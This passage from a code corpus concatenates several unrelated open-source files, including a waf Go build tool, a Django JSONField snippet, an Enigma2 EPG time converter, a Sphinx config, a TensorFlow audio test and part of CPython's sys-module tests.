if not ('cgopackage' in self.features):
#print('--> [%s]... (%s)' % (go[0], getattr(self, 'target', 'N/A')))
tsk = self.create_compiled_task('go', go[0])
tsk.inputs.extend(go[1:])
else:
#print ('+++ [%s] +++' % self.target)
bld_dir = self.path.get_bld().make_node('cgopackage--%s' % self.target.replace(os.sep,'_'))
obj_dir = bld_dir.make_node('_obj')
target = obj_dir.make_node(self.target+'.a')
tsk = self.create_task('cgopackage', go, [target, bld_dir])
self.link_task = tsk
@feature('gopackage', 'goprogram', 'cgopackage')
@after_method('process_source', 'apply_incpaths',)
def go_local_libs(self):
names = self.to_list(getattr(self, 'use', []))
#print ('== go-local-libs == [%s] == use: %s' % (self.name, names))
for name in names:
tg = self.bld.get_tgen_by_name(name)
if not tg:
raise Utils.WafError('no target of name %r necessary for %r in go uselib local' % (name, self))
tg.post()
#print ("-- tg[%s]: %s" % (self.name,name))
lnk_task = getattr(tg, 'link_task', None)
if lnk_task:
for tsk in self.tasks:
if isinstance(tsk, (go, gopackage, cgopackage)):
tsk.set_run_after(lnk_task)
tsk.dep_nodes.extend(lnk_task.outputs)
path = lnk_task.outputs[0].parent.abspath()
if isinstance(lnk_task, (go, gopackage)):
# handle hierarchical packages
path = lnk_task.generator.path.get_bld().abspath()
elif isinstance(lnk_task, (cgopackage,)):
# handle hierarchical cgopackages
cgo_obj_dir = lnk_task.outputs[1].find_or_declare('_obj')
path = cgo_obj_dir.abspath()
# recursively add parent GOCFLAGS...
self.env.append_unique('GOCFLAGS',
getattr(lnk_task.env, 'GOCFLAGS',[]))
# ditto for GOLFLAGS...
self.env.append_unique('GOLFLAGS',
getattr(lnk_task.env, 'GOLFLAGS',[]))
self.env.append_unique('GOCFLAGS', ['-I%s' % path])
self.env.append_unique('GOLFLAGS', ['-L%s' % path])
for n in getattr(tg, 'includes_nodes', []):
self.env.append_unique('GOCFLAGS', ['-I%s' % n.abspath()])
pass
pass
def configure(conf):
def set_def(var, val):
if not conf.env[var]:
conf.env[var] = val
goarch = os.getenv('GOARCH')
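# Historical note: pre-1.5 Go toolchains named their tools per architecture,
# e.g. 6g/6l for amd64, 8g/8l for 386 and 5g/5l for arm, hence the mapping below.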
if goarch == '386':
set_def('GO_PLATFORM', 'i386')
elif goarch == 'amd64':
set_def('GO_PLATFORM', 'x86_64')
elif goarch == 'arm':
set_def('GO_PLATFORM', 'arm')
else:
set_def('GO_PLATFORM', platform.machine())
if conf.env.GO_PLATFORM == 'x86_64':
set_def('GO_COMPILER', '6g')
set_def('GO_LINKER', '6l')
elif conf.env.GO_PLATFORM in ('i386', 'i486', 'i586', 'i686'):
set_def('GO_COMPILER', '8g')
set_def('GO_LINKER', '8l')
elif conf.env.GO_PLATFORM == 'arm':
set_def('GO_COMPILER', '5g')
set_def('GO_LINKER', '5l')
set_def('GO_EXTENSION', '.5')
if not (conf.env.GO_COMPILER or conf.env.GO_LINKER):
raise conf.fatal('Unsupported platform ' + platform.machine())
set_def('GO_PACK', 'gopack')
set_def('gopackage_PATTERN', '%s.a')
set_def('CPPPATH_ST', '-I%s')
set_def('GOMAKE_FLAGS', ['--quiet'])
conf.find_program(conf.env.GO_COMPILER, var='GOC')
conf.find_program(conf.env.GO_LINKER, var='GOL')
conf.find_program(conf.env.GO_PACK, var='GOP')
conf.find_program('cgo', var='CGO')
TaskGen.feature('go')(process_use)
TaskGen.feature('go')(propagate_uselib_vars)
|
Vogtinator/micropython
|
refs/heads/nspire
|
tests/import/pkg3/subpkg1/mod1.py
|
118
|
print("subpkg1.mod1 __name__:", __name__)
from ..mod2 import foo
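# Note (illustrative): the ".." above resolves against this module's package,
# so `from ..mod2 import foo` imports foo from pkg3.mod2.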
|
thomazs/geraldo
|
refs/heads/master
|
site/newsite/django_1_0/django/contrib/djangoplus/fieldtypes/__init__.py
|
9
|
import datetime
from django.db import models
from django.db.models import signals
from django.conf import settings
from django.utils import simplejson as json
from django.dispatch import dispatcher
"""
JSONField: http://www.djangosnippets.org/snippets/377/
"""
class JSONEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(obj, datetime.date):
return obj.strftime('%Y-%m-%d')
elif isinstance(obj, datetime.time):
return obj.strftime('%H:%M:%S')
return json.JSONEncoder.default(self, obj)
def dumps(data):
return JSONEncoder().encode(data)
def loads(str):
return json.loads(str, encoding=settings.DEFAULT_CHARSET)
class JSONField(models.TextField):
def db_type(self):
return 'text'
def pre_save(self, model_instance, add):
value = getattr(model_instance, self.attname, None)
return dumps(value)
def contribute_to_class(self, cls, name):
super(JSONField, self).contribute_to_class(cls, name)
dispatcher.connect(self.post_init, signal=signals.post_init, sender=cls)
def get_json(model_instance):
return dumps(getattr(model_instance, self.attname, None))
setattr(cls, 'get_%s_json' % self.name, get_json)
def set_json(model_instance, json):
return setattr(model_instance, self.attname, loads(json))
setattr(cls, 'set_%s_json' % self.name, set_json)
def post_init(self, instance=None):
value = self.value_from_object(instance)
if (value):
setattr(instance, self.attname, loads(value))
else:
setattr(instance, self.attname, None)
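# A minimal usage sketch (model and field names are illustrative): declaring
# a JSONField on a model gains the get_/set_<name>_json accessors wired up in
# contribute_to_class above:
#
#   class Entry(models.Model):
#       data = JSONField()
#
#   e = Entry(data={'a': 1})
#   e.get_data_json()           # -> '{"a": 1}'
#   e.set_data_json('{"b": 2}')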
|
TwolDE2/enigma2
|
refs/heads/6.2
|
lib/python/Components/Converter/EventTime.py
|
52
|
from Converter import Converter
from Poll import Poll
from time import time
from Components.Element import cached, ElementError
from Components.config import config
from enigma import eEPGCache
class EventTime(Poll, Converter, object):
STARTTIME = 0
ENDTIME = 1
REMAINING = 2
REMAINING_VFD = 3
PROGRESS = 4
DURATION = 5
ELAPSED = 6
ELAPSED_VFD = 7
NEXT_START_TIME = 8
NEXT_END_TIME = 9
NEXT_DURATION = 10
THIRD_START_TIME = 11
THIRD_END_TIME = 12
THIRD_DURATION = 13
def __init__(self, type):
Converter.__init__(self, type)
Poll.__init__(self)
self.epgcache = eEPGCache.getInstance()
if type == "EndTime":
self.type = self.ENDTIME
elif type == "Remaining":
self.type = self.REMAINING
self.poll_interval = 60*1000
self.poll_enabled = True
elif type == "VFDRemaining":
self.type = self.REMAINING_VFD
self.poll_interval = 60*1000
self.poll_enabled = True
elif type == "StartTime":
self.type = self.STARTTIME
elif type == "Duration":
self.type = self.DURATION
elif type == "Progress":
self.type = self.PROGRESS
self.poll_interval = 30*1000
self.poll_enabled = True
elif type == "Elapsed":
self.type = self.ELAPSED
self.poll_interval = 60*1000
self.poll_enabled = True
elif type == "VFDElapsed":
self.type = self.ELAPSED_VFD
self.poll_interval = 60*1000
self.poll_enabled = True
elif type == "NextStartTime":
self.type = self.NEXT_START_TIME
elif type == "NextEndTime":
self.type = self.NEXT_END_TIME
elif type == "NextDurartion":
self.type = self.NEXT_DURATION
elif type == "ThirdStartTime":
self.type = self.THIRD_START_TIME
elif type == "ThirdEndTime":
self.type = self.THIRD_END_TIME
elif type == "ThirdDurartion":
self.type = self.THIRD_DURATION
else:
raise ElementError("'%s' is not <StartTime|EndTime|Remaining|Elapsed|Duration|Progress> for EventTime converter" % type)
@cached
def getTime(self):
assert self.type != self.PROGRESS
event = self.source.event
if event is None:
return None
st = event.getBeginTime()
if self.type == self.STARTTIME:
return st
duration = event.getDuration()
if self.type == self.DURATION:
return duration
st += duration
if self.type == self.ENDTIME:
return st
if self.type == self.REMAINING or self.type == self.REMAINING_VFD or self.type == self.ELAPSED or self.type == self.ELAPSED_VFD:
now = int(time())
remaining = st - now
if remaining < 0:
remaining = 0
start_time = event.getBeginTime()
end_time = start_time + duration
elapsed = now - start_time
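# The swap_time_remaining_* config value selects the tuple layout returned
# downstream: "0" gives (duration, own value), "1" swaps in the other value,
# "2" gives (duration, elapsed, remaining), "3" gives (duration, remaining, elapsed).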
if start_time <= now <= end_time:
if self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "0":
return duration, remaining
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "1":
return duration, elapsed
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "2":
return duration, elapsed, remaining
elif self.type == self.REMAINING and config.usage.swap_time_remaining_on_osd.value == "3":
return duration, remaining, elapsed
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "0":
return duration, elapsed
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "1":
return duration, remaining
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "2":
return duration, elapsed, remaining
elif self.type == self.ELAPSED and config.usage.swap_time_remaining_on_osd.value == "3":
return duration, remaining, elapsed
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "0":
return duration, remaining
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "1":
return duration, elapsed
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "2":
return duration, elapsed, remaining
elif self.type == self.REMAINING_VFD and config.usage.swap_time_remaining_on_vfd.value == "3":
return duration, remaining, elapsed
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "0":
return duration, elapsed
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "1":
return duration, remaining
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "2":
return duration, elapsed, remaining
elif self.type == self.ELAPSED_VFD and config.usage.swap_time_remaining_on_vfd.value == "3":
return duration, remaining, elapsed
else:
return duration, None
elif self.type == self.NEXT_START_TIME or self.type == self.NEXT_END_TIME or self.type == self.NEXT_DURATION or self.type == self.THIRD_START_TIME or self.type == self.THIRD_END_TIME or self.type == self.THIRD_DURATION:
reference = self.source.service
info = reference and self.source.info
if info is None:
return
test = [ 'IBDCX', (reference.toString(), 1, -1, 1440) ] # search next 24 hours
self.list = [] if self.epgcache is None else self.epgcache.lookupEvent(test)
if self.list:
try:
if self.type == self.NEXT_START_TIME and self.list[1][1]:
return self.list[1][1]
elif self.type == self.NEXT_END_TIME and self.list[1][1] and self.list[1][2]:
return int(self.list[1][1]) + int(self.list[1][2])
elif self.type == self.THIRD_START_TIME and self.list[2][1]:
return self.list[2][1]
elif self.type == self.THIRD_END_TIME and self.list[2][1] and self.list[2][2]:
return int(self.list[2][1]) + int(self.list[2][2])
else:
# failed to return any epg data.
return None
except:
# failed to return any epg data.
return None
@cached
def getValue(self):
assert self.type == self.PROGRESS
event = self.source.event
if event is None:
return None
progress = int(time()) - event.getBeginTime()
duration = event.getDuration()
if duration > 0 and progress >= 0:
if progress > duration:
progress = duration
return progress * 1000 / duration
else:
return None
time = property(getTime)
value = property(getValue)
range = 1000
def changed(self, what):
Converter.changed(self, what)
if self.type == self.PROGRESS and len(self.downstream_elements):
if not self.source.event and self.downstream_elements[0].visible:
self.downstream_elements[0].visible = False
elif self.source.event and not self.downstream_elements[0].visible:
self.downstream_elements[0].visible = True
|
rcritten/novajoin
|
refs/heads/master
|
doc/source/conf.py
|
1
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import sphinx_rtd_theme
import pbr.version
version_info = pbr.version.VersionInfo('novajoin')
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'novajoin'
copyright = u'2016, Red Hat'
author = 'Rob Crittenden'
# The short X.Y version.
version = version_info.version_string()
# The full version, including alpha/beta/rc tags.
release = version_info.release_string()
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'Red Hat', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
|
futuresystems/465-git4hiroaki
|
refs/heads/master
|
HW3/hshioi_cloudmesh_ex2.py
|
4
|
# coding: utf-8
import cloudmesh
print cloudmesh.shell("cloud list")
print cloudmesh.shell("cloud on india")
print cloudmesh.shell("cloud list")
|
whn09/tensorflow
|
refs/heads/master
|
tensorflow/contrib/ffmpeg/encode_audio_op_test.py
|
75
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for third_party.tensorflow.contrib.ffmpeg.encode_audio_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
from tensorflow.contrib import ffmpeg
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
class EncodeAudioOpTest(test.TestCase):
def _compareWavFiles(self, original, encoded):
"""Compares the important bits of two WAV files.
Some encoders will create a slightly different header to the WAV file.
This compares only the important bits of the header as well as the contents.
Args:
original: Contents of the original .wav file.
encoded: Contents of the new, encoded .wav file.
"""
self.assertLess(44, len(original))
self.assertLess(44, len(encoded))
self.assertEqual(original[:4], encoded[:4])
# Skip file size
self.assertEqual(original[8:16], encoded[8:16])
# Skip header size
self.assertEqual(original[20:36], encoded[20:36])
# Skip extra bits inserted by ffmpeg.
self.assertEqual(original[original.find(b'data'):],
encoded[encoded.find(b'data'):])
def testRoundTrip(self):
"""Reads a wav file, writes it, and compares them."""
with self.test_session():
path = os.path.join(resource_loader.get_data_files_path(),
'testdata/mono_10khz.wav')
with open(path, 'rb') as f:
original_contents = f.read()
audio_op = ffmpeg.decode_audio(
original_contents,
file_format='wav',
samples_per_second=10000,
channel_count=1)
encode_op = ffmpeg.encode_audio(
audio_op, file_format='wav', samples_per_second=10000)
encoded_contents = encode_op.eval()
self._compareWavFiles(original_contents, encoded_contents)
if __name__ == '__main__':
test.main()
|
mancoast/CPythonPyc_test
|
refs/heads/master
|
fail/340_test_sys.py
|
3
|
import unittest, test.support
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import platform
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit as exc:
self.assertEqual(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit(42)
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit((42,))
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit as exc:
self.assertEqual(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit as exc:
self.assertEqual(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (ascii(stderr), ascii(expected)))
# test that the stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, 'gettrace') and sys.gettrace(),
'fatal error if run with a trace function')
def test_recursionlimit_recovery(self):
# NOTE: this test is slightly fragile in that it depends on the current
# recursion count when executing the test being low enough so as to
# trigger the recursion recovery detection in the _Py_MakeEndRecCheck
# macro (see ceval.h).
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for i in (50, 1000):
# Issue #5392: stack overflow after hitting recursion limit twice
sys.setrecursionlimit(i)
self.assertRaises(RuntimeError, f)
self.assertRaises(RuntimeError, f)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RuntimeError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
        # from f123.  This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
@unittest.skipUnless(hasattr(sys, 'thread_info'),
'Threading required for this test.')
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
